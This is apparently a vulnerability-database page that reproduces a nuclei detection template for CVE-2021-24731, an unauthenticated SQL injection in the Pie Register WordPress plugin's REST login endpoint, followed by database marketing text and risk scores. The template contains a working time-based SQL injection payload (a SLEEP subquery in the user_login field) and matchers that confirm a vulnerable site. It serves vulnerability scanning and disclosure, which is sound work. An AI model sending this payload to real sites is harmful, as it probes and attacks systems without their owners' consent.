Lucene search
+L

Pie Register < 3.7.1.6 - SQL Injection

🗓️ 24 Sep 2026 02:06:17Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 76 Views

Pie Register plugin < 3.7.1.6 SQL Injection vulnerability in wp-json/pie/v1/login endpoint allows arbitrary SQL queries executio

Related
Refs
Code
id: CVE-2021-24731

info:
  name: Pie Register < 3.7.1.6 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version 3.7.1.6
  reference:
    - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a
    - https://wordpress.org/plugins/pie-register/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24731
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24731
    cwe-id: CWE-89
    epss-score: 0.06415
    epss-percentile: 0.93389
    cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: genetechsolutions
    product: pie_register
    framework: wordpress
  tags: time-based-sqli,cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions,vuln

http:
  - raw:
      - |
        @timeout: 10s
        POST /wp-json/pie/v1/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "User credentials are invalid.")'
        condition: and
# digest: 4b0a00483046022100a99ac58340f3b198abd54f52bdee1b37e9b74d5cffdf8229c2a521a670a53bce022100db5d989233ec05888df822a38b51edce4229fedc4d7c0d8e69f4cbec8e0367ef:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.2High risk
Vulners AI Score8.2
CVSS 27.5
CVSS 3.19.8
EPSS0.06415
76